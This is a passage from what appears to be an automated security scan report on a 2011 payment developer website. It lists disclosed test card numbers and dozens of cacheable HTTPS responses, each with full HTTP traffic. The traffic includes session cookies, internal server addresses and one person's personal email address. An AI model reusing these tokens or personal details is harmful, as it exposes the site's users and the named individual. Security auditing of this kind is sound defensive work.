and EMAIL parameters with the appropriate data.&amp;#160; To receive the response VERBOSITY must be set to HIGH.&lt;br/&gt;&lt;br/&gt;Example Request:&lt;br/&gt;TRXTYPE=S&amp;amp;TENDER=C&amp;amp;ACCT=373953192351004&amp;amp;AMT=100.00&amp;amp;EXPDATE=1210&amp;amp;&lt;br/&gt;&lt;strong&gt;PHONENUM=4083456789&lt;/strong&gt;&amp;amp;&lt;strong&gt;VERBOSITY=HIGH&lt;/strong&gt;&amp;amp;&lt;strong&gt;EMAIL=myemail at e
...[SNIP]...
paid debit card with a remaining balance of $100.&lt;br/&gt;&lt;/li&gt;&lt;li&gt;Merchant requests authorization for $75.&lt;br/&gt;&lt;br/&gt;TRXTYPE=A&amp;amp;TENDER=C&amp;amp;AMT=75.00&amp;amp;ACCT=4111111111111111&amp;amp;&lt;span style="color: #ff0000;"&gt;PARTIALAUTH=Y&lt;/span&gt;&amp;amp;EXPDATE=0119&amp;amp;&lt;br/&gt;&lt;span style="color: #ff0000;"&gt;VERBOSITY=HIGH&lt;br/&gt;&lt;/span&gt;&lt;br/&gt;&lt;
...[SNIP]...

10.2. https://www.x.com/docs/DOC-2241  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2241

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /docs/DOC-2241 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333335323b3130322c333332323b3130322c333335313b3130322c333335333b3130322c333335343b3130322c333335353b3130322c333334353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=129237 t=1313157242766813
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<br/>TRXTYPE=S&amp;TENDER=C&amp;AMT=11&amp;ACCT=4012888888881881&amp;EXPDATE=0119&amp;<br/>
...[SNIP]...
</strong>&amp;TENDER=C&amp;ACCT=5105105105105100&amp;EXPDATE=1212&amp;<br/>
...[SNIP]...
<br/>ACCT=4111111111111111&amp;EXPDATE=0213&amp;START=01252010&amp;<strong style="color: #ff0000; ">
...[SNIP]...
<br/>TRXTYPE=S&amp;TENDER=C&amp;ACCT=373953192351004&amp;AMT=100.00&amp;EXPDATE=1210&amp;<br/>
...[SNIP]...

11. Cacheable HTTPS response  previous  next
There are 68 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


11.1. https://www.x.com/dwr/interface/Clearvote.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /dwr/interface/Clearvote.js

Request

GET /dwr/interface/Clearvote.js HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/index.jspa
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:27 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:50:30 GMT
Cache-Control: max-age=60
Content-Type: text/plain
Content-Length: 810
JP: D=267 t=1313114368350872
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (Clearvote == null) var Clearvot
...[SNIP]...

11.2. https://www.x.com/ideas/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /ideas/

Request

GET /ideas/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: User-Agent
JP: D=66606589 t=1313157225229043
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.3. https://www.x.com/opensearch.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /opensearch.xml

Request

GET /opensearch.xml HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:07 GMT
Server: Apache-Coyote/1.1
Content-Type: application/opensearchdescription+xml;charset=UTF-8
Vary: User-Agent
JP: D=2678 t=1313157007976957
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>X Developer Network</ShortName>
<Description>Search X Developer Network</D
...[SNIP]...

11.4. https://www.x.com/people  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people

Request

GET /people HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=3394146 t=1313157260109910
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.5. https://www.x.com/people/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/

Request

GET /people/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=2685593 t=1313157107815185
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.6. https://www.x.com/people/BaldGeek  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek

Request

GET /people/BaldGeek HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:49 GMT; Path=/
Vary: User-Agent
JP: D=151430 t=1313156329683258
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.7. https://www.x.com/people/BaldGeek.vcf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek.vcf

Request

GET /people/BaldGeek.vcf HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/x-vcard;charset=UTF-8
Content-Language: en-US
JP: D=5452 t=1313157111270263
Vary: User-Agent
Connection: close

BEGIN:VCARD
VERSION:3.0
FN:Naveed Anwar
ORG:PayPal
EMAIL;TYPE=internet:naveedanwar@gmail.com
TZ:Pacific Standard Time
URL:http://x.com
END:VCARD

11.8. https://www.x.com/people/BaldGeek/blog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek/blog

Request

GET /people/BaldGeek/blog HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=127143 t=1313157109294622
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.9. https://www.x.com/people/CorinneSherman  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/CorinneSherman

Request

GET /people/CorinneSherman HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38393433393b332c323030383b332c35333735313b332c35333436333b332c35353331393b332c35333437343b332c35373137393b332c3133363935343b332c3133373131353b332c36303039313b; Expires=Sun, 11-Sep-2011 13:51:54 GMT; Path=/
Vary: User-Agent
JP: D=153786 t=1313157114086096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.10. https://www.x.com/people/GiancarloUk2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/GiancarloUk2

Request

GET /people/GiancarloUk2 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38383139383b332c3131353037373b332c3130383730353b332c3131303734313b332c3131303831343b332c38323534333b332c3131353130373b332c38353530363b332c3131313737343b332c38373839383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=109527 t=1313157149159421
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.11. https://www.x.com/people/IndieReign  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/IndieReign

Request

GET /people/IndieReign HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303730373b332c38383139383b332c38373839383b332c3134313133383b332c38353530363b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3131353037373b; Expires=Sun, 11-Sep-2011 13:52:30 GMT; Path=/
Vary: User-Agent
JP: D=98253 t=1313157150770204
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.12. https://www.x.com/people/JasonVenner  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/JasonVenner

Request

GET /people/JasonVenner HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133383538323b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b; Expires=Sun, 11-Sep-2011 13:51:49 GMT; Path=/
Vary: User-Agent
JP: D=146802 t=1313157109565171
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.13. https://www.x.com/people/MrcheckAPX  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/MrcheckAPX

Request

GET /people/MrcheckAPX HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:48 GMT; Path=/
Vary: User-Agent
JP: D=97089 t=1313157168042186
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.14. https://www.x.com/people/PP_Igor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_Igor

Request

GET /people/PP_Igor HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b; Expires=Sun, 11-Sep-2011 13:52:09 GMT; Path=/
Vary: User-Agent
JP: D=77818 t=1313157129602041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.15. https://www.x.com/people/PP_MTS_Andre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Andre

Request

GET /people/PP_MTS_Andre HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b; Expires=Sun, 11-Sep-2011 13:52:06 GMT; Path=/
Vary: User-Agent
JP: D=85787 t=1313157126041615
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.16. https://www.x.com/people/PP_MTS_Chad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Chad

Request

GET /people/PP_MTS_Chad HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c33353136303b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=167980 t=1313157123846369
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.17. https://www.x.com/people/PP_MTS_GuidoT  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_GuidoT

Request

GET /people/PP_MTS_GuidoT HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b; Expires=Sun, 11-Sep-2011 13:52:07 GMT; Path=/
Vary: User-Agent
JP: D=96030 t=1313157127847926
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.18. https://www.x.com/people/PP_MTS_Magarvin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Magarvin

Request

GET /people/PP_MTS_Magarvin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c35333639373b332c33353136303b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=130947 t=1313157124385931
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.19. https://www.x.com/people/PP_MTS_Patrick  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Patrick

Request

GET /people/PP_MTS_Patrick HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133313833303b332c3132393239303b332c3133373135383b332c3133373331333b332c3132323335343b332c3133393730313b332c3133343430323b332c39313330313b332c3134303635343b332c34383739343b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=143994 t=1313157132945144
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.20. https://www.x.com/people/PayPalXadmin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPalXadmin

Request

GET /people/PayPalXadmin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:39 GMT; Path=/
Vary: User-Agent
JP: D=96924 t=1313157159108661
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.21. https://www.x.com/people/PayPal_Carolyn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Carolyn

Request

GET /people/PayPal_Carolyn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c323030383b332c35333437343b332c3133363935343b332c3133373131353b332c35333735313b332c3133383538323b332c36303039313b332c3133373331333b332c35353331393b332c3133363236393b; Expires=Sun, 11-Sep-2011 13:51:51 GMT; Path=/
Vary: User-Agent
JP: D=182753 t=1313157111682138
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.22. https://www.x.com/people/PayPal_Sudha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Sudha

Request

GET /people/PayPal_Sudha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333436333b332c36303039313b332c323030383b332c35333437343b332c3133363935343b332c3133373131353b332c35333735313b332c3133383538323b332c3133373331333b332c35353331393b; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=104130 t=1313157112744233
Connection: close

